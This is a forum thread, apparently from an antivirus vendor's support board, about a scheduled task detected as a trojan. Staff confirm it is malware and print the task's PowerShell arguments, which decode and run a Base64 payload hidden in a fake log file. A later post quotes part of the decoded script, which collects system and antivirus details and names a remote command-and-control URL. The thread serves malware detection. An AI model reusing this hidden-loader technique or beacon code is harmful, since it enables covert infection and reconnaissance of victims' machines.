Jump to content

.vbs run task (from microsoft) detected as trojan


Peca21
 Share

Recommended Posts

  • Staff

Can you please attach a copy of the task located here:

 

Trojan.VBS.TaskExecution, C:\WINDOWS\SYSTEM32\TASKS\Microsoft\Windows\NetService\Network\NetServices

 

It may have to be zipped in order to attach. 

 

i have disabled the rule for now till further investigation of the task. There is a malware that is currently misuing the vbs script using a task with the syncappserver.vbs by microsoft to decode itself and run. It hides itself in legit text files/logs and uses this vbs to decode the malware portion out of the txt file. 

A copy of the legit task would help us better to write a rule not to hit it. 

 

Thanks. 

 

 

 

Edited by shadowwar
Link to post
Share on other sites

  • Staff

This is not a fp .

 

 <Arguments>"n; $a=Get-Content "C:\Windows\logs\system-logs.txt" | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block</Arguments>
    </Exec>
  </Actions>

 

can you zip and attach this file also?

C:\Windows\logs\system-logs.txt

 

  • Like 1
Link to post
Share on other sites

There is a Base64 encoded script embedded in that, what is supposed to be just  a LOG file.

Excerpt:
 

Spoiler
scriptItem = Get-Item -Path $MyInvocation.MyCommand.Path;
$OS_Major = [System.Environment]::OSVersion.Version.Major.ToString() + "." + [System.Environment]::OSVersion.Version.Minor.ToString();
$EndPointURL = "http://api.private-chatting.com/connect";
$__Version__ = "M_35";
[string]$WorkerEnHandle = [Guid]::NewGuid().ToString();
[System.Threading.EventWaitHandle]$WorkerEn = [System.Threading.EventWaitHandle]::new($true, [System.Threading.EventResetMode]::ManualReset, $WorkerEnHandle);

function XF3a8JO3r5r8G([string] $str) {
    return [System.Environment]::ExpandEnvironmentVariables("%" + $str + "%")
}

function WMI([string] $class, [string] $value) {
    $val = $null;
    $results = (Get-WmiObject -Class $class) ;
    foreach ($item in $results) {
        $val = $item[$value];
        break;
    }
    if ($val -eq $null) {
        $val = [Guid]::NewGuid().ToString();
    }
    return $val;
}
function Get-HWID() {
    return (WMI 'win32_logicaldisk' "VolumeSerialNumber") 
}

function ik9hXhN11R() {
    return (WMI 'Win32_OperatingSystem' "Caption") 
}

function P9TEtu77LCNtD() {
    return (WMI 'Win32_Processor' "AddressWidth") 
}

function av_enabled([uint32]$state) {
    [byte[]] $bytes = [System.BitConverter]::GetBytes($state);
    if (($bytes[1] -eq 0x10) -or ($bytes[1] -eq 0x11)) {
        return "Enabled";
    }
    elseif (($bytes[1] -eq 0x00) -or ($bytes[1] -eq 0x01) -or ($bytes[1] -eq 0x20) -or ($bytes[1] -eq 0x21)) {
        return "Disabled";
    }
    return "Unknown";
}

 

 

Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.